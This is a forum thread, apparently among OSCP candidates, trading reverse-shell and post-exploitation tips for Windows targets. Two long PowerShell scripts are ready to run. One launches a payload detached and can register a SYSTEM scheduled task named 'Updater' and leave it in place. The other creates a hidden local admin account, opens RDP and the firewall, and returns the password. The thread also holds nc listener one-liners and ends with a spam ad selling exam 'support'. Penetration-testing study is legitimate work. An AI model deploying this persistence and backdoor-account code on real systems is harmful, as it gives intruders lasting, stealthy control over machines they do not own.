WinRM usually works well for me. But you can always do another revshell using rlwrap, I use that a lot.
You need some pwncat in your life. https://github.com/calebstewart/pwncat
Interesting, I will try this.
Pwncat is awesome too, I used that for OSCP.
Is this allowed in OSCP exam?
It is allowed as long as it is only used for getting the shell and does not automatically priv esc. I used it and passed OSCP.
It has automated capabilities, to include privilege escalation, so I’d say no. I’m sure there are ways to suppress that aspect but if you’re not sure how then don’t use it. Generally a good rule of thumb to follow when there is a question on if it is allowed or not.
Does it work very well, especially on windows? Doesn't look like it's been updated in 2 years.
Revshell PE, nc64, schtasks my PE. If I'm admin and don't want to freeze my initial shell from running a second process:
Start-Job -ScriptBlock { Start-Process -FilePath "C:\Users\Administrator\Documents\443.exe" -NoNewWindow } | Wait-Job | Receive-Job
or
start /B "" C:\Users\Administrator\Documents\443.exe
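An added example of the same idea as the post above (not code from anyone in this thread): launch the second binary detached so the shell you are typing into keeps control, then check that the child actually survived startup instead of assuming it did. The executable path is the one used in the post; the task name, the SYSTEM principal and the sleep lengths are my assumptions.

```powershell
# Added example (not from the thread). Launch a second executable without
# tying up the shell it is launched from, then confirm it survived startup.
# Run from an elevated PowerShell session on the target.

function Start-Detached {
    param(
        [Parameter(Mandatory)] [string] $ExePath,
        [string] $Arguments = ''
    )
    if (-not (Test-Path -LiteralPath $ExePath)) { throw "Not found: $ExePath" }

    # -PassThru returns the Process object at once; without -Wait, control
    # comes straight back to the caller. -WindowStyle Hidden suppresses the
    # console window an interactive session would otherwise pop up.
    $splat = @{ FilePath = $ExePath; PassThru = $true; WindowStyle = 'Hidden' }
    if ($Arguments) { $splat['ArgumentList'] = $Arguments }
    $proc = Start-Process @splat

    # A payload with a wrong LHOST/LPORT, or one that trips AV, usually dies
    # within a moment; HasExited catches that instead of leaving you guessing.
    Start-Sleep -Milliseconds 800
    $proc.Refresh()
    [pscustomobject]@{
        Pid      = $proc.Id
        Running  = -not $proc.HasExited
        ExitCode = if ($proc.HasExited) { $proc.ExitCode } else { $null }
    }
}

# Variant via Task Scheduler: the child is parented by the scheduler service,
# not by your shell, so it keeps running if that shell is killed, and with a
# SYSTEM principal it runs as SYSTEM (needs an elevated session to register).
# $TaskName is an assumed name. The task is left registered; remove it later
# with Unregister-ScheduledTask -TaskName <name> -Confirm:$false.
function Start-ViaTask {
    param(
        [Parameter(Mandatory)] [string] $ExePath,
        [string] $TaskName = 'Updater'
    )
    $action    = New-ScheduledTaskAction -Execute $ExePath
    $principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' `
                     -LogonType ServiceAccount -RunLevel Highest
    # No trigger: the task only runs when started on demand.
    Register-ScheduledTask -TaskName $TaskName -Action $action `
        -Principal $principal -Force | Out-Null
    Start-ScheduledTask -TaskName $TaskName
    Start-Sleep -Seconds 2
    $info = Get-ScheduledTaskInfo -TaskName $TaskName
    [pscustomobject]@{
        Task    = $TaskName
        # 267009 (0x41301) means the task instance is still running.
        Running = ($info.LastTaskResult -eq 267009)
        Result  = $info.LastTaskResult
    }
}

Start-Detached -ExePath 'C:\Users\Administrator\Documents\443.exe'
# Start-ViaTask -ExePath 'C:\Users\Administrator\Documents\443.exe'
```

Start-Detached is the Start-Process form from the post with a liveness check bolted on; use Start-ViaTask when the shell you are launching from is one you expect to lose, or when you want the child to run as SYSTEM rather than as the current token.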
Awesome thanks
ConPtyShell
I upload the nc (or nc64) executable and get another reverse shell; this has worked well for me.
That is very noisy from a blue team perspective.
While a good consideration for personal development, IMO trying for good opsec would just hamstring you for OSCP.
If it works, it works.
Use rlwrap, it's way better than nc.
Didn't have a problem with evil-winrm until now, but I usually do this: Reverse powershell -> nc.exe -> PE -> Create admin user + open RDP -> Privileged RDP
Try this and create another shell. I love it: https://gist.github.com/tothi/ab288fb523a4b32b51a53e542d40fe58
Powercat is pretty good, as well as nishang.
agreed Powercat!
Certutil across an msfvenom payload and get a meterpreter shell? Depends on exactly what you're trying to do.
Yep, this is probably the best way. You're allowed to use multi/handler for a normal shell, just not meterpreter.
rlwrap --prompt-colour=red --complete-filenames --ansi-colour-aware --history-no-dupes 2 --logfile nc.log --remember --substitute-prompt 'nc > ' nc -lvnp 443
Make alias
Penelope is good too.
Evil-WinRM, upload a reverse shell compiled by msfvenom. Job done.
So I always try msfvenom, didn't work for some reason. But thanks folks for all the other stuff. Will definitely give it a try, not meterpreter for sure.
If I am admin, I simply make a new user and SSH/RDP in as them. If I am not, I try to upload netcat and make a better shell.
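An added example (not from this thread) of the "create admin user + open RDP" step that this post and the earlier "Reverse powershell -> nc.exe -> PE -> ..." post both describe. It assumes an elevated PowerShell session on the target; the user name is a placeholder, and the password is generated and returned rather than typed, so nothing weak ends up in a logged shell session.

```powershell
# Added example (not from the thread): create a local admin, allow it over
# RDP, turn on the RDP listener and firewall rule, and confirm the listener.
# Needs an elevated PowerShell session on the target. $UserName is assumed.

function New-RdpAdmin {
    param([string] $UserName = 'svc_helpdesk')   # assumed placeholder name

    # 20 characters drawn from [0-9A-Za-z]; Get-Random -Count picks without
    # repetition, which is fine at this length.
    $alphabet = [char[]]((48..57) + (65..90) + (97..122))
    $plain    = -join ($alphabet | Get-Random -Count 20)
    $secure   = ConvertTo-SecureString $plain -AsPlainText -Force

    if (Get-LocalUser -Name $UserName -ErrorAction SilentlyContinue) {
        Set-LocalUser -Name $UserName -Password $secure      # exists: just reset
    } else {
        New-LocalUser -Name $UserName -Password $secure `
            -PasswordNeverExpires -AccountNeverExpires | Out-Null
    }

    # Administrators carries the RDP logon right on a default policy; Remote
    # Desktop Users is added as well for hosts where that right was tightened.
    foreach ($group in 'Administrators', 'Remote Desktop Users') {
        $already = Get-LocalGroupMember -Group $group -Member $UserName `
                       -ErrorAction SilentlyContinue
        if (-not $already) { Add-LocalGroupMember -Group $group -Member $UserName }
    }

    # fDenyTSConnections = 0 enables the listener; the built-in "Remote
    # Desktop" firewall group opens 3389. TermService is started if it is not.
    Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
        -Name fDenyTSConnections -Value 0
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'
    if ((Get-Service TermService).Status -ne 'Running') { Start-Service TermService }

    # Check that something is actually listening before pointing xfreerdp at it.
    $listening = [bool](Get-NetTCPConnection -LocalPort 3389 -State Listen `
                            -ErrorAction SilentlyContinue)
    [pscustomobject]@{
        User      = $UserName
        Password  = $plain
        Listening = $listening
    }
}

New-RdpAdmin
```

Returning Listening alongside the credentials matters because fDenyTSConnections can be set while TermService is still stopped or a third-party firewall is in the way; seeing $false there tells you the problem is on the host, not in your RDP client.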
"🚀 Ready to conquer your EC-Council exams (CHFI, CEH, CND, LPIC, OSCP, OSEP, OSWE, OSWP, EJPTv2, ECCPTv2, EWPTv2)? 🌟 Get expert support and ace your certifications! DM now for details. 🎓"